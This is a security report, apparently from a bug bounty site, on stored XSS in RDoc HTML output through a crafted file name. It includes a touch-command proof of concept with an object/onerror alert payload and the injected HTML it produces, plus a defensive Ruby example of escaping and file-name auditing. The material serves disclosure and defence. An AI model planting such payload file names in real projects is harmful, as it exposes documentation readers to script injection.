XSS exploit of RDoc documentation generated by rdoc

Medium
Ruby
Reported by sighook

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Stored
When creating RDoc HTML documentation, it is possible to inject malicious code through a file name.

# PoC

```bash
~ $ touch \"\>\<object\ src\=1\ onerror\=\"javascript\:alert\(1\)\;\"\>Controlling\ what\ is\ documented\ here
~ $ ls
"><object src=1 onerror="blocked:alert(1);">Controlling what is documented here
~ $ rdoc --all
```

Now the generated index file contains the injected JavaScript code:

```html
...
<li><a href="./"><object src=1 onerror="blocked:alert(1);">Controlling what is documented here.html">&quot;&gt;&lt;object src=1 onerror=&quot;blocked:alert(1);&quot;&gt;Controlling what is documented here</a>
...
```

I set the vulnerability to the same severity as CVE-2013-0256, since rdoc is widely used on dev/production systems, for online documentation, etc. An attacker can hide a badly named file deep in the project structure to be stealthy. Also, the file can have a tricky name in the documentation list and can contain real documentation code, so as not to arouse suspicion for some time.

## Impact

The injected code can exfiltrate data or install malware on the (user|developer)'s machine, etc.
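The report shows a file name being copied verbatim into both the `href` attribute and the link text of the generated index. The Ruby snippet below is an added example written for this page; it is not RDoc's code and not part of the report. It assumes a simplified generator that emits one `<li><a ...>` entry per file, places a naive entry next to a hardened one that percent-encodes each path segment and HTML-escapes both the attribute and the text, and adds a pre-generation audit that flags file names carrying HTML metacharacters. The sample names, including the one mirroring the report's file name, are constructed; `suspicious_filenames`, `unsafe_entry`, `safe_entry` and `injected_tags` are hypothetical helper names.

```ruby
require 'erb'

# Constructed sample: two ordinary names and one carrying HTML markup
# (the same shape as the file name in the report above).
SAMPLE_NAMES = [
  "README",
  "lib/foo.rb",
  "\"><object src=1 onerror=\"javascript:alert(1);\">Controlling what is documented here"
].freeze

# Characters that a documentation generator must never copy verbatim into
# markup: tag/attribute delimiters, the entity introducer, and control bytes.
SUSPICIOUS = /[<>"'&]|[[:cntrl:]]/

# Pre-generation audit: return the file names that deserve a closer look
# before the tree is passed to a documentation tool.
def suspicious_filenames(names)
  names.select { |n| n.match?(SUSPICIOUS) }
end

# Naive index entry: raw interpolation into the attribute and the text.
# This reproduces the defect class described in the report; kept only for
# comparison with safe_entry below.
def unsafe_entry(name)
  %(<li><a href="./#{name}.html">#{name}</a></li>)
end

# Hardened index entry: every path segment is percent-encoded as a URL
# component (slashes between segments are kept so nested files still
# resolve), the resulting href is HTML-escaped as an attribute value, and
# the visible link text is HTML-escaped separately.
def safe_entry(name)
  segments = "#{name}.html".split('/').map { |s| ERB::Util.url_encode(s) }
  href = ERB::Util.html_escape(segments.join('/'))
  text = ERB::Util.html_escape(name)
  %(<li><a href="./#{href}">#{text}</a></li>)
end

# Tags a well-formed index entry is allowed to contain.
EXPECTED_TAGS = ["<li", "<a", "</a", "</li"].freeze

# Return every tag opener in the entry beyond the expected wrapper; a
# non-empty result means the file name broke out of the attribute or text.
def injected_tags(entry)
  entry.scan(%r{</?\w+}) - EXPECTED_TAGS
end

if __FILE__ == $PROGRAM_NAME
  puts "flagged: #{suspicious_filenames(SAMPLE_NAMES).inspect}"
  SAMPLE_NAMES.each do |n|
    puts "unsafe -> #{injected_tags(unsafe_entry(n)).inspect}"
    puts "safe   -> #{injected_tags(safe_entry(n)).inspect}"
  end
end
```

Running the audit before invoking the generator is the cheap control: a file name that contains `<`, `>`, `"` or `&` has no legitimate place in a source tree, and rejecting it up front does not depend on every downstream template escaping correctly. The two encoding steps in `safe_entry` are distinct on purpose: percent-encoding makes the name a valid URL component, HTML-escaping makes it a valid attribute value, and skipping either one leaves a path into the markup.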

Related CVEs

Associated Common Vulnerabilities and Exposures

darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before 4.0.0.preview2.1, as used in Ruby, does not properly generate documents, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted URL.

Report Details

Additional information and metadata

State

Closed

Substate

Informative

Weakness

Cross-site Scripting (XSS) - Stored